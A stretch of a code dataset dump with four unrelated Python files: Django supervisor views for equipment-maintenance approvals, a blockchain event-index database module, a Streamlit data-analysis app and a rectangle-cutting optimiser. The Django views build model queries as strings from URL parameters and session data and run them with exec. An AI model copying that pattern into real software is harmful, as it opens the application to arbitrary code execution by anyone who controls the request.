render(request,'supervisor/scctv_impm_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n \n # return render(request,'supervisor/imp_details.html',{'temp':i,'names':name})\n elif name == 'scctvweekly':\n \n return render(request,'supervisor/scctv_impw_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \ndef mail(request,id):\n # print(reverse(\"supervisor:choice\"))\n # print(sid)\n id=decode(request,id)\n mail= models.Engineer.objects.filter(emp_id=id).values('email')\n \n print(mail[0]['email'])\n \n return render(request,\"supervisor/sendmail.html\",{'eid':mail[0]['email'],'uid':id})\n\ndef sent(request):\n send=request.POST['feedback']\n print(send)\n mail_from=models.Supervisor.objects.filter(supervisor_id=request.session.get('uid')).values('email')\n print(mail_from)\n mail=\"From:\"+mail_from[0]['email']+\"\\n\"+send \n str1='temp=models.'\n str2='.objects.get(p_id='\n str3=')'\n names1=request.session['name'].capitalize()\n pid=request.session['pid']\n que=str1+names1+str2+str(request.session['pid'])+str3\n del request.session['name']\n del request.session['pid']\n exec(que,globals())\n now = datetime.datetime.now()\n date=now.strftime(\"%Y-%m-%d\")\n time=now.strftime(\"%H:%M:%S\")\n temp.approval_date=date\n temp.approval_time=time\n temp.unit_incharge_approval='NO'\n\n temp.status=\"PENDING\"\n\n print(\"temp\")\n # currdate = date.today()\n temp.save()\n \n print(temp)\n send_mail('urgent',mail,'aai.urgent@gmail.com',['naik.varun99@gmail.com'],fail_silently=False)\n # return render(request,'supervisor/imp_details.html',{'temp':temp[0],'names':names1,'logs':logs})\n return HttpResponseRedirect(reverse('supervisor:details',kwargs={'id':encode(request,str(pid)), 'name':names1}))\n # details(request,encode(request,str(pid)),names1)\ndef verify(request,names,id):\n \n ids=id\n id=decode(request,id)\n print(id)\n str1='temp=models.'\n str2='.objects.get(p_id='\n str3=')'\n names1=names.capitalize()\n \n que=str1+names1+str2+id+str3\n print(que)\n exec(que,globals())\n now = datetime.datetime.now()\n date=now.strftime(\"%Y-%m-%d\")\n time=now.strftime(\"%H:%M:%S\")\n temp.unit_incharge_approval='YES'\n temp.approval_date=date\n temp.approval_time=time\n temp.save()\n str1='context=[entry for entry in models.'\n str2='.objects.all().values()]'\n now = datetime.datetime.now()\n # names1=names.capitalize()\n # print('here')\n # print(names1)\n que=str1+names1+str2\n \n exec(que,globals())\n for i in context:\n i['token']=encode(request,str(i['p_id'])) \n if i['unit_incharge_approval']=='YES':\n i['flag']=1\n elif i['unit_incharge_approval']=='NO':\n i['flag']=0\n else:\n i['flag']='not set'\n # cdvordaily=[entry for entry in models.Cdvordaily.objects.all().values()]\n print(\"com\")\n # print(context)\n print(\"return\")\n # return HttpResponseRedirect(reverse('supervisor:details',args={'id':ids, 'name':names1}))\n # details(request,ids,names1)\n str1='temp=models.'\n str2='.objects.filter(p_id='\n str3=').values()'\n str4='.objects.all('\n que=str1+names1+str2+str(id)+str3\n exec(que,globals())\n str1='mrec=models.'\n que=str1+names1+str4+str3+\".order_by('-date')\"\n exec(que,globals())\n # UNCOMMENT WHEN DONE WITH ALL LOG TABLES\n logname=names1+'logs'\n logname=logname.replace('daily','d')\n logname=logname.replace('monthly','m')\n logname=logname.replace('weekly','w')\n logname=logname.replace('yearly','y')\n # print(logname)\n name=names1[0].lower()+names1[1:]\n # # logname=name+'logs'\n str1='logs=models.'\n str2='.objects.filter(p_id='\n str3=').values()'\n request.session['pid']=id\n request.session['name']=names\n que=str1+logname+str2+str(id)+str3+\".order_by('-log_id')\"\n exec(que,globals())\n # print(\"logs:\")\n # print(logs)\n i=temp[0]\n i['e_token']=encode(request,str(i['emp_id']))\n i['p_token']=encode(request,str(i['p_id']))\n eng=models.Engineer.objects.filter(emp_id=temp[0]['emp_id']).values()\n # print(i)\n redir='supervisor:'+name\n if name =='datisdaily':\n return render(request,'supervisor/imp_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec})\n elif name == 'datisweekly':\n \n return render(request,'supervisor/impw_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n \n elif name == 'dscndaily':\n \n return render(request,'supervisor/dscn_imp_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n elif name == 'dscnmonthly':\n \n return render(request,'supervisor/dscn_impm_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n \n elif name == 'cdvordaily':\n \n return render(request,'supervisor/cdvor_imp_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n elif name == 'cdvormonthly':\n \n return render(request,'supervisor/cdvor_impm_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n \n # return render(request,'supervisor/imp_details.html',{'temp':i,'names':name})\n elif name == 'cdvorweekly':\n \n return render(request,'supervisor/cdvor_impw_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n elif name == 'scctvdaily':\n \n return render(request,'supervisor/scctv_imp_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n elif name == 'scctvmonthly':\n \n return render(request,'supervisor/scctv_impm_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n \n # return render(request,'supervisor/imp_details.html',{'temp':i,'names':name})\n elif name == 'scctvweekly':\n \n return render(request,'supervisor/scctv_impw_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n\ndef empdetails(request,id):\n id=decode(request,id)\n \n uid=request.session['uid']\n eng=models.Engineer.objects.filter(emp_id=id).values() \n # datisweekly=[entry for entry in models.Datisweekly.objects.filter(emp_id=id).values().order_by('-date')]\n # datis=datisdaily+[i for i in datisweekly]\n # print(datis)\n # for i in datis:\n # # eng=models.Engineer.objects.filter(emp_id=i['emp_id']).values()\n \n \n # i.update({'type':'Datisdaily','token':encode(request,str(i['p_id']))})\n # print(i['e_name'])\n # print(datis)\n if request.session.get('dept')=='N':\n Cdvordaily=[entry for entry in models.Cdvordaily.objects.filter(emp_id=id).values().order_by('-date')]\n for item in Cdvordaily:\n item.update( {\"type\":\"Cdvordaily\"})\n Cdvorweekly=[entry for entry in models.Cdvorweekly.objects.filter(emp_id=id).values().order_by('-date')]\n \n for item in Cdvorweekly:\n item.update( {\"type\":\"Cdvorweekly\"})\n \n\n \n Cdvormonthly=[entry for entry in models.Cdvormonthly.objects.filter(emp_id=id).values().order_by('-date')]\n for item in Cdvormonthly:\n item.update( {\"type\":\"Cdvormonthly\"}) \n \n \n com=Cdvordaily+[i for i in Cdvorweekly]+[i for i in Cdvormonthly]\n com=sorted(com,key=itemgetter('date'),reverse=True)\n \n eng=[entry for entry in models.Engineer.objects.filter(supervisor_id=uid).values()]\n for i in com:\n\n i.update({'token':encode(request,str(i['p_id']))})\n\n\n \n \n \n elif request.session.get('dept')=='C':\n datisdaily=[entry for entry in models.Datisdaily.objects.filter(emp_id=id).values().order_by('-date')]\n for item in datisdaily:\n item.update( {\"type\":\"Datisdaily\"})\n \n datisweekly=[entry for entry in models.Datisweekly.objects.filter(emp_id=id).values().order_by('-date')]\n for item in datisweekly:\n item.update( {\"type\":\"Datisweekly\"})\n \n vhfdaily=[entry for entry in models.Vhfdaily.objects.filter(emp_id=id).values().order_by('-date')]\n for item in vhfdaily:\n item.update( {\"type\":\"Vhfdaily\"})\n \n \n # vhfweekly=[entry for entry in models.Vhfweekly.objects.filter(emp_id=id).values().order_by('-date')]\n # for item in vhfweekly:\n # item.update( {\"type\":\"Vhfweekly\"})\n vhfmonthly=[entry for entry in models.Vhfmonthly.objects.filter(emp_id=id).values().order_by('-date')]\n for item in vhfmonthly:\n item.update( {\"type\":\"Vhfmonthly\"})\n \n dscndaily=[entry for entry in models.Dscndaily.objects.filter(emp_id=id).values().order_by('-date')]\n for item in dscndaily:\n item.update( {\"type\":\"Dscndaily\"})\n \n \n dscnweekly=[entry for entry in models.Dscnweekly.objects.filter(emp_id=id).values().order_by('-date')]\n for item in dscnweekly:\n item.update( {\"type\":\"Dscnweekly\"})\n \n dscnmonthly=[entry for entry in models.Dscnmonthly.objects.filter(emp_id=id).values().order_by('-date')]\n for item in dscnmonthly:\n item.update( {\"type\":\"Dscnmonthly\"})\n \n \n com=datisdaily+[i for i in datisweekly]+[i for i in dscnweekly]+[i for i in dscndaily]+[i for i in dscnmonthly]+[i for i in vhfdaily]+[i for i in vhfmonthly]\n com=sorted(com,key=itemgetter('date'),reverse=True)\n for i in com:\n\n i.update({'token':encode(request,str(i['p_id']))})\n\n \n elif request.session.get('dept')=='S':\n \n \n Scctvdaily=[entry for entry in models.Scctvdaily.objects.filter(emp_id=id).values().order_by('-date')]\n for item in Scctvdaily:\n item.update( {\"type\":\"Scctvdaily\"})\n \n \n Scctvweekly=[entry for entry in models.Scctvweekly.objects.filter(emp_id=id).values().order_by('-date')]\n for item in Scctvweekly:\n item.update( {\"type\":\"Scctvweekly\"})\n \n Scctvmonthly=[entry for entry in models.Scctvmonthly.objects.filter(emp_id=id).values().order_by('-date')]\n for item in Scctvmonthly:\n item.update( {\"type\":\"Scctvmonthly\"})\n \n \n com=[i for i in Scctvweekly]+[i for i in Scctvdaily]+[i for i in Scctvmonthly]\n com=sorted(com,key=itemgetter('date'),reverse=True)\n for i in com:\n\n i.update({'token':encode(request,str(i['p_id']))})\n return render(request,'supervisor/employee_details.html',{'datis':com,'e_name':eng[0]['name'],'e_desig':eng[0]['designation'],'e_contact':eng[0]['contact'],'e_email':eng[0]['email']})\n\ndef encode(request,s):\n\n f=frt(request.session['key'].encode('utf-8'))\n token = f.encrypt(s.encode('utf-8'))\n # print(token.decode('utf-8'))\n return token.decode('utf-8')\n\ndef decode(request,s):\n f=frt(request.session['key'].encode('utf-8'))\n token = f.decrypt(s.encode('utf-8'))\n # print(token.decode('utf-8'))\n return token.decode('utf-8')\n\n","sub_path":"supervisor/views/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"493220065","text":"\"\"\"provide access to the ethindex database\"\"\"\n\nimport collections\nimport itertools\nimport logging\nfrom typing import Any, Dict, List\n\nimport psycopg2\nimport psycopg2.extras\n\nfrom relay.blockchain import (\n currency_network_events,\n exchange_events,\n token_events,\n unw_eth_events,\n)\nfrom relay.blockchain.events import BlockchainEvent, TLNetworkEvent\nfrom relay.blockchain.proxy import sorted_events\n\n# proxy.get_all_events just asks for these network events. so we need the list\n# here.\n\n\nlogger = logging.getLogger(\"ethindex_db\")\n\n\ndef connect(dsn):\n return psycopg2.connect(dsn, cursor_factory=psycopg2.extras.RealDictCursor)\n\n\n# EventsQuery is used to store a where block together with required parameters\n# EthindexDB._run_events_query uses this to build and run a complete query.\nEventsQuery = collections.namedtuple(\"EventsQuery\", [\"where_block\", \"params\"])\n\n\nclass EventBuilder:\n \"\"\"Event Builder builds BlockchainEvents from web3 like events We use\n pretty much the same logic like relay.blockchain.Proxy (or its\n subclasses). The handling for timestamps is different. We also don't ask\n web3 for the currentBlock. It's passed in from the caller.\n\n So, this could be merged with the implementation in Proxy.\n \"\"\"\n\n def __init__(self, _event_builders: Dict[str, Any]) -> None:\n self.event_builders = _event_builders\n\n def build_events(\n self, events: List[Any], current_blocknumber: int\n ) -> List[BlockchainEvent]:\n return [self._build_event(event, current_blocknumber) for event in events]\n\n @property\n def event_types(self) -> List[str]:\n return list(self.event_builders.keys())\n\n def _build_event(self, event: Any, current_blocknumber: int) -> BlockchainEvent:\n event_type: str = event.get(\"event\")\n timestamp: int = event.get(\"timestamp\")\n return self.event_builders[event_type](event, current_blocknumber, timestamp)\n\n\n# we need to 'select * from events' all the time, but we're using lower-case\n# identifiers in postgres. The following select statement will give us a\n# dictionary with keys in the right case.\nselect_star_from_events = \"\"\"SELECT transactionHash \"transactionHash\",\n blockNumber \"blockNumber\",\n address,\n eventName \"event\",\n args,\n blockHash \"blockHash\",\n transactionIndex \"transactionIndex\",\n logIndex \"logIndex\",\n timestamp\n FROM events\n \"\"\"\n\norder_by_default_sort_order = \"\"\" ORDER BY blocknumber, transactionIndex, logIndex\n \"\"\"\n\n\nclass EthindexDB:\n \"\"\"EthIndexDB provides a partly compatible interface for the\n relay.blockchain.currency_network_proxy.CurrencyNetworkProxy,\n relay.blockchain.token_proxy.TokenProxy and\n relay.blockchain.unw_eth_proxy.UnwEthProxy classes\n\n We implement just enough to make it possible to use this as a drop-in\n replacement for relay.api.resources, that is, just the event reading.\n\n Since the proxy classes operates on one network address only,\n we allow to pass a default address in.\n \"\"\"\n\n def __init__(\n self, conn, standard_event_types, event_builders, from_to_types, address=None\n ):\n self.conn = conn\n self.default_address = address\n self.standard_event_types = standard_event_types\n self.event_builder = EventBuilder(event_builders)\n self.from_to_types = from_to_types\n\n @property\n def event_types(self):\n return self.event_builder.event_types\n\n def _build_events(self, rows):\n return self.event_builder.build_events(rows, self._get_current_blocknumber())\n\n def _get_current_blocknumber(self):\n with self.conn.cursor() as cur:\n cur.execute(\"\"\"select * from sync where syncid='default'\"\"\")\n row = cur.fetchone()\n if row:\n return row[\"last_block_number\"]\n else:\n raise RuntimeError(\"Could not determine current block number\")\n\n def _get_addr(self, address):\n \"\"\"all the methods here take an address argument\n At the moment we use the default address instead. Eventually callers will\n need to provide this argument, and we can remove the\n default_address.\n \"\"\"\n r = address or self.default_address\n assert r, \"no network address passed in and no default network address given\"\n return r\n\n def _get_standard_event_types(self, standard_event_types):\n r = standard_event_types or self.standard_event_types\n assert r, \"no standard event passed in and no default events given\"\n return r\n\n def _run_events_query(self, events_query: EventsQuery) -> List[BlockchainEvent]:\n \"\"\"run a query on the events table\"\"\"\n query_string = \"{select_star_from_events} WHERE {where_block} {order_by_default_sort_order}\".format(\n select_star_from_events=select_star_from_events,\n where_block=events_query.where_block,\n order_by_default_sort_order=order_by_default_sort_order,\n )\n\n with self.conn as conn:\n with conn.cursor() as cur:\n cur.execute(query_string, events_query.params)\n rows = cur.fetchall()\n return self._build_events(rows)\n\n def get_network_events(\n self,\n event_name: str,\n user_address: str = None,\n from_block: int = 0,\n timeout: float = None,\n ) -> List[BlockchainEvent]:\n \"\"\"Function for compatibility with relay.blockchain.CurrencyNetworkProxy.\n Will be removed after a refactoring\n \"\"\"\n return self.get_user_events(event_name, user_address, from_block, timeout)\n\n def get_unw_eth_events(\n self,\n event_name: str,\n user_address: str = None,\n from_block: int = 0,\n timeout: float = None,\n ) -> List[BlockchainEvent]:\n \"\"\"Function for compatibility with relay.blockchain.UnwEthProxy. Will be removed after a refactoring\"\"\"\n return self.get_user_events(event_name, user_address, from_block, timeout)\n\n def get_token_events(\n self,\n event_name: str,\n user_address: str = None,\n from_block: int = 0,\n timeout: float = None,\n ) -> List[BlockchainEvent]:\n \"\"\"Function for compatibility with relay.blockchain.TokenProxy. Will be removed after a refactoring\"\"\"\n return self.get_user_events(event_name, user_address, from_block, timeout)\n\n def get_exchange_events(\n self,\n event_name: str,\n user_address: str = None,\n from_block: int = 0,\n timeout: float = None,\n ) -> List[BlockchainEvent]:\n \"\"\"Function for compatibility with relay.blockchain.ExchangeProxy. Will be removed after a refactoring\"\"\"\n return self.get_user_events(event_name, user_address, from_block, timeout)\n\n def get_user_events(\n self,\n event_name: str,\n user_address: str = None,\n from_block: int = 0,\n timeout: float = None,\n contract_address: str = None,\n ) -> List[BlockchainEvent]:\n contract_address = self._get_addr(contract_address)\n if user_address is None:\n return self.get_events(\n event_name,\n from_block=from_block,\n timeout=timeout,\n contract_address=contract_address,\n )\n query = EventsQuery(\n \"\"\"blockNumber>=%s\n AND eventName=%s\n AND address=%s\n AND (args->>'{_from}'=%s or args->>'{_to}'=%s)\n \"\"\".format(\n _from=self.from_to_types[event_name][0],\n _to=self.from_to_types[event_name][1],\n ),\n (from_block, event_name, contract_address, user_address, user_address),\n )\n\n events = self._run_events_query(query)\n\n logger.debug(\n \"get_user_events(%s, %s, %s, %s, %s) -> %s rows\",\n event_name,\n user_address,\n from_block,\n timeout,\n contract_address,\n len(events),\n )\n\n for event in events:\n if isinstance(event, TLNetworkEvent):\n event.user = user_address\n else:\n raise ValueError(\"Expected a TLNetworkEvent\")\n return events\n\n def get_all_unw_eth_events(\n self, user_address: str = None, from_block: int = 0, timeout: float = None\n ) -> List[BlockchainEvent]:\n return self.get_all_contract_events(\n unw_eth_events.standard_event_types, user_address, from_block, timeout\n )\n\n def get_all_token_events(\n self, user_address: str = None, from_block: int = 0, timeout: float = None\n ) -> List[BlockchainEvent]:\n return self.get_all_contract_events(\n token_events.standard_event_types, user_address, from_block, timeout\n )\n\n def get_all_network_events(\n self, user_address: str = None, from_block: int = 0, timeout: float = None\n ) -> List[BlockchainEvent]:\n return self.get_all_contract_events(\n currency_network_events.standard_event_types,\n user_address,\n from_block,\n timeout,\n )\n\n def get_all_exchange_events(\n self, user_address: str = None, from_block: int = 0, timeout: float = None\n ) -> List[BlockchainEvent]:\n return self.get_all_contract_events(\n exchange_events.standard_event_types, user_address, from_block, timeout\n )\n\n def get_all_contract_events(\n self,\n event_types: List[str],\n user_address: str = None,\n from_block: int = 0,\n timeout: float = None,\n contract_address: str = None,\n ) -> List[BlockchainEvent]:\n # XXX The following code should be replaced with a proper SQL query.\n # The reason it isn't already a SQL query, is that we need to\n # dynamically create that query.\n contract_address = self._get_addr(contract_address)\n results = [\n self.get_user_events(\n event_type,\n user_address=user_address,\n from_block=from_block,\n timeout=timeout,\n contract_address=contract_address,\n )\n for event_type in event_types\n ]\n return sorted_events(list(itertools.chain.from_iterable(results)))\n\n def get_events(\n self,\n event_name,\n from_block=0,\n timeout: float = None,\n contract_address: str = None,\n ) -> List[BlockchainEvent]:\n contract_address = self._get_addr(contract_address)\n query = EventsQuery(\n \"\"\"blockNumber>=%s\n AND eventName=%s\n AND address=%s\"\"\",\n (from_block, event_name, contract_address),\n )\n events = self._run_events_query(query)\n\n logger.debug(\n \"get_events(%s, %s, %s, %s) -> %s rows\",\n event_name,\n from_block,\n timeout,\n contract_address,\n len(events),\n )\n\n return events\n\n def get_all_events(\n self,\n from_block: int = 0,\n timeout: float = None,\n contract_address: str = None,\n standard_event_types=None,\n ) -> List[BlockchainEvent]:\n contract_address = self._get_addr(contract_address)\n standard_event_types = self._get_standard_event_types(standard_event_types)\n query = EventsQuery(\n \"\"\"blockNumber>=%s\n AND address=%s\n AND eventName in %s\"\"\",\n (from_block, contract_address, tuple(standard_event_types)),\n )\n\n events = self._run_events_query(query)\n logger.debug(\n \"get_all_events(%s, %s, %s) -> %s rows\",\n from_block,\n timeout,\n contract_address,\n len(events),\n )\n\n return events\n","sub_path":"relay/ethindex_db.py","file_name":"ethindex_db.py","file_ext":"py","file_size_in_byte":11941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"170963116","text":"import numpy as np\r\nimport pandas as pd\r\nimport streamlit as st\r\nfrom pandas_profiling import ProfileReport\r\nfrom streamlit_pandas_profiling import st_profile_report\r\n\r\ndef main():\r\n html_temp1 = \"\"\"<div style=\"background-color:#6D7B8D;padding:10px\">\r\n \t\t<h4 style=\"color:white;text-align:center;\">Exploratory data Analysis Application</h4>\r\n \t\t</div>\r\n \t\t<div>\r\n \t\t</br>\"\"\"\r\n st.markdown(html_temp1, unsafe_allow_html=True)\r\n\r\n menu = [\"Home\", \"EDA\", \"About\"]\r\n choice = st.sidebar.selectbox(\"Menu\", menu, 2)\r\n # for hide menu\r\n hide_streamlit_style = \"\"\"\r\n <style>\r\n #MainMenu {visibility: hidden;}\r\n footer {visibility: hidden;}\r\n </style>\r\n \"\"\"\r\n st.markdown(hide_streamlit_style, unsafe_allow_html=True)\r\n\r\n st.sidebar.markdown(\r\n \"\"\" Developed by Mohammad Juned Khan \r\n Email : Mohammad.juned.z.khan@gmail.com \r\n [LinkedIn] (https://www.linkedin.com/in/md-juned-khan)\"\"\")\r\n if choice == \"Home\":\r\n # color codes ff1a75 6D7B8D\r\n html_temp2 = \"\"\"<div style=\"background-color:#6D7B8D;padding:10px\">\r\n \t\t<h4 style=\"color:white;text-align:center;\">This is the Exploratory data Analysis Application created using Streamlit framework and pandas-profiling library.</h4>\r\n \t\t</div>\r\n \t\t<div>\r\n \t\t</br>\"\"\"\r\n st.markdown(html_temp2, unsafe_allow_html=True)\r\n\r\n elif choice == \"EDA\":\r\n html_temp3 = \"\"\"\r\n \t\t<div style=\"background-color:#98AFC7;padding:10px\">\r\n \t\t<h4 style=\"color:white;text-align:center;\">Upload file Your file in csv formate and perform Exploratory Data Analysis</h4>\r\n \t\t<h5 style=\"color:white;text-align:center;\">Make sure your columns have correct data types before uploading.</h5>\r\n \t\t</div>\r\n \t\t<br></br>\"\"\"\r\n\r\n st.markdown(html_temp3, unsafe_allow_html=True)\r\n st.subheader(\"Perform Exploratory data Analysis with Pandas Profiling Library\")\r\n data_file= st.file_uploader(\"Upload a csv file\", type=[\"csv\"])\r\n if st.button(\"Analyze\"):\r\n if data_file is not None:\r\n # Pandas Profiling Report\r\n @st.cache\r\n def load_csv():\r\n csv = pd.read_csv(data_file)\r\n return csv\r\n\r\n df = load_csv()\r\n pr = ProfileReport(df, explorative=True)\r\n st.header('*User Input DataFrame*')\r\n st.write(df)\r\n st.write('---')\r\n st.header('*Exploratory Data Analysis Report Using Pandas Profiling*')\r\n st_profile_report(pr)\r\n else:\r\n st.success(\"Upload file\")\r\n else:\r\n pass\r\n # st.write(\"Check similarity of Resume and Job Description\")\r\n elif choice == \"About\":\r\n html_temp4 = \"\"\"\r\n \t\t<div style=\"background-color:#98AFC7;padding:10px\">\r\n \t\t<h4 style=\"color:white;text-align:center;\">This Application is developed by Mohammad Juned Khan using Streamlit Framework. If you're on LinkedIn and want to connect, just click on the link in sidebar and shoot me a request. You can also mail your comments. </h4>\r\n \t\t<h4 style=\"color:white;text-align:center;\">Thanks for Visiting</h4>\r\n\r\n \t\t</div>\r\n \t\t<br></br>\r\n \t\t<br></br>\"\"\"\r\n\r\n st.markdown(html_temp4, unsafe_allow_html=True)\r\n else:\r\n pass\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"EDA_APP.py","file_name":"EDA_APP.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"148890667","text":"import os\nimport numpy as np\nimport itertools\nimport pickle\nimport random\nimport math\nimport scipy.optimize\n\nR = 180\nC = 60\nH = 3\nA = 12\n\ndef get_hams (M,a):\n return np.sum(M[a[0][0]:a[0][1],a[1][0]:a[1][1]])\n\ndef get_area (a):\n assert(a[0][1]>=a[0][0])\n assert(a[1][1]>=a[1][0])\n return (a[0][1]-a[0][0]+1)*(a[1][1]-a[1][0]+1)\n\ndef cut_is_valid (P,a):\n if np.sum(P[a[0][0]:a[0][1]+1,a[1][0]:a[1][1]+1]) > 0:\n return False\n else:\n return True\n\ndef update_map (P,a,v=1):\n P[a[0][0]:a[0][1]+1,a[1][0]:a[1][1]+1]=v\n return P\n\ndef comp_score (M,cuts):\n score = 0\n for c in cuts:\n v = get_area(c)\n h = get_hams(M,c)\n assert(v<=A)\n assert(v>=H)\n score += v\n return score\n\ndef get_fill_rate (cuts):\n P = np.zeros((R,C))\n for a in cuts:\n P = update_map(P,a)\n\n return np.sum(P) / (R*C)\n\ndef draw_cuts (cuts):\n P = np.zeros((R,C))\n for a in cuts:\n P = update_map(P,a)\n\n for r in range(R):\n str = ''\n for c in range(C):\n str += '%d' % P[r,c]\n print(str)\n\ndef grid_cuts(M):\n cuts = []\n rl = np.arange(0,R,3)\n rr = rl+2\n rz = list(zip(rl,rr))\n cl = np.arange(0,C,4)\n cr = cl+3\n cz = list(zip(cl,cr))\n xz = itertools.product(rz,cz)\n for c in xz:\n if get_hams(M,c) >= H:\n cuts.append(c)\n return cuts\n\ndef list_fmts (M):\n fmts = []\n for c in range(1,12):\n for r in range(1,12):\n if c*r >= 3 and c*r <= A:\n fmts.append((r,c))\n fmts = list(set(fmts))\n for fmt in fmts:\n assert(fmt[0]*fmt[1]<=A)\n return fmts\n\ndef is_in (a,b):\n return (a[0][0]>=b[0][0]) and (a[0][0]<=b[0][1]) and \\\n (a[0][1]>=b[0][0]) and (a[0][1]<=b[0][1]) and \\\n (a[1][0]>=b[1][0]) and (a[1][0]<=b[1][1]) and \\\n (a[1][1]>=b[1][0]) and (a[1][1]<=b[1][1])\n\ndef list_good_cuts (M,fmts):\n if os.path.isfile('gcuts.bin'):\n return pickle.load(open('gcuts.bin','rb'))\n\n cuts = []\n for fmt in fmts:\n for c in range(C):\n for r in range(R):\n #print('%d %d %d x %d' % (c,r,fmt[0],fmt[1]))\n a = ((r,r+fmt[0]-1),(c,c+fmt[1]-1))\n assert(get_area(a)<=A)\n if is_in (a,((0,R-1),(0,C-1))) and get_hams(M,a)>=3:\n cuts.append(a)\n pickle.dump(cuts,open('gcuts.bin','wb'))\n return(cuts)\n\ndef sigmoid(x):\n return 1 / (1+math.exp(-x))\n\ndef check_cuts (cuts):\n for a in cuts:\n area_a = get_area(a)\n if area_a>A:\n print(a)\n print(area_a)\n assert(area_a<=A)\n\ndef init_solution (M, g_cuts):\n\n best_score = 0\n best_cuts = None\n best_idx = None\n for r in range(10):\n\n ng = len(g_cuts)\n is_kept = np.zeros(ng)\n P = np.zeros(M.shape)\n score = 0\n\n for k in range(100000):\n i = random.randint(0,ng-1)\n a = g_cuts[i]\n area_a = get_area(a)\n assert(area_a)<=A\n\n if is_kept[i] == 0:\n if cut_is_valid (P,a):\n P = update_map(P,a)\n score += area_a\n assert(score == np.sum(P))\n is_kept[i] = 1\n #print(score)\n\n elif is_kept[i] == 1:\n # remove at random\n thresh = .9#15*(1-sigmoid(math.log(math.log(k)))*(12/area_a))\n #print(thresh)\n if random.random() > thresh:\n is_kept[i] = 0\n score -= area_a\n P = update_map(P,a,0)\n assert(score == np.sum(P))\n #print(score)\n\n if score>best_score:\n best_score=score\n best_idx = np.nonzero(is_kept==1)[0].astype(int)\n best_cuts = []\n for j in range(ng):\n if is_kept[j]==1:\n best_cuts.append(g_cuts[j])\n print(best_score)\n print('Initial score : %d' % best_score)\n print('Check : %d/%d' % (comp_score(M,best_cuts),np.sum(P)))\n return (best_cuts,best_idx)\n\ndef read_data (in_file):\n with open(in_file,'r') as fp:\n d = fp.readline().split(' ')\n vs = []\n for x in fp.readlines():\n v = x.strip().replace('H','1').replace('T','0')\n v = list(map(int,v))\n vs.append(v)\n M = np.vstack(tuple(vs))\n print(M)\n return M\n\ndef optimize_cuts (M, good_cuts, init_cuts, init_cuts_idx):\n\n # init map\n P = np.zeros(M.shape)\n for i in init_cuts_idx:\n a = good_cuts[i]\n assert(cut_is_valid(P,a))\n P = update_map(P,a)\n\n assert(len(init_cuts)==len(init_cuts_idx))\n score = np.sum(P)\n print('Initial score : %d (%d cuts)' % (score,len(init_cuts_idx)))\n print('Check : %d' % comp_score(M,init_cuts))\n cuts_idx = init_cuts_idx.copy()\n\n # fix rectangles\n for k in range(10):\n\n # select a rectangle at random\n r1 = random.randint(0,R-30)\n c1 = random.randint(0,C-30)\n z = ((r1,r1+30),(c1,c1+30))\n\n # remove all cuts inside Z\n tmp_cuts_idx = []\n for i in cuts_idx:\n a = good_cuts[i]\n if not is_in(a,z):\n tmp_cuts_idx.append(i)\n else:\n P = update_map(P,a,0)\n cuts_idx = tmp_cuts_idx\n #print('%d cuts left after removal. New score : %d' % (len(cuts_idx),np.sum(P)))\n\n # list candidate cuts\n candidate_cuts = []\n candidate_idx = []\n for (ca_c,a) in zip(range(len(good_cuts)),good_cuts):\n if is_in(a,z) and cut_is_valid(P,a):\n candidate_cuts.append(a)\n candidate_idx.append(ca_c)\n n_candidates = len(candidate_cuts)\n\n W = np.zeros((get_area(z),n_candidates))\n W_row=0\n for r in range(z[0][0],z[0][1]+1):\n for c in range(z[1][0],z[1][1]+1):\n for (ca_c,ca) in zip(range(n_candidates),candidate_cuts):\n if is_in(((r,r),(c,c)),ca):\n W[W_row,ca_c] = 1\n W_row += 1\n Q = np.zeros(W.shape[0])+1\n Z = np.array([get_area(a) for a in candidate_cuts])\n\n # solve min(-Z'x) with W.x <= Q\n #print('Solving for %d candidates...' % n_candidates)\n res = scipy.optimize.linprog(-Z,W,Q,None,None,(0,1),'simplex',None,None)\n if not res.success:\n continue\n resx = np.round(res.x)\n assert((W.dot(resx)<=Q).all())\n for (x_c,s) in zip(range(resx.size),resx):\n if s == 1:\n a = good_cuts[candidate_idx[x_c]]\n assert(cut_is_valid(P,a))\n P = update_map(P,a)\n cuts_idx.append(candidate_idx[x_c])\n score = np.sum(P)\n cuts = []\n for i in cuts_idx:\n cuts.append(good_cuts[i])\n print('%d(%d),%s' % (int(score),comp_score(M,cuts),get_fill_rate(cuts)))\n return cuts\n\ndef main():\n\n random.seed(123456)\n\n M = read_data ('test_round.in')\n\n cuts = grid_cuts(M)\n grid_score = comp_score(M,cuts)\n print(grid_score)\n\n # list good cuts\n good_cuts = list_good_cuts(M,list_fmts(M))\n print('%d possible cuts' % len(good_cuts))\n\n # check\n check_cuts(good_cuts)\n\n # find init solution\n (init_cuts,init_cuts_idx) = init_solution (M, good_cuts)\n\n # optimize cuts\n opt_cuts = optimize_cuts (M,good_cuts,init_cuts,init_cuts_idx)\n\n # draw cuts\n draw_cuts (opt_cuts)\n\nif __name__ == \"__main__\":\n 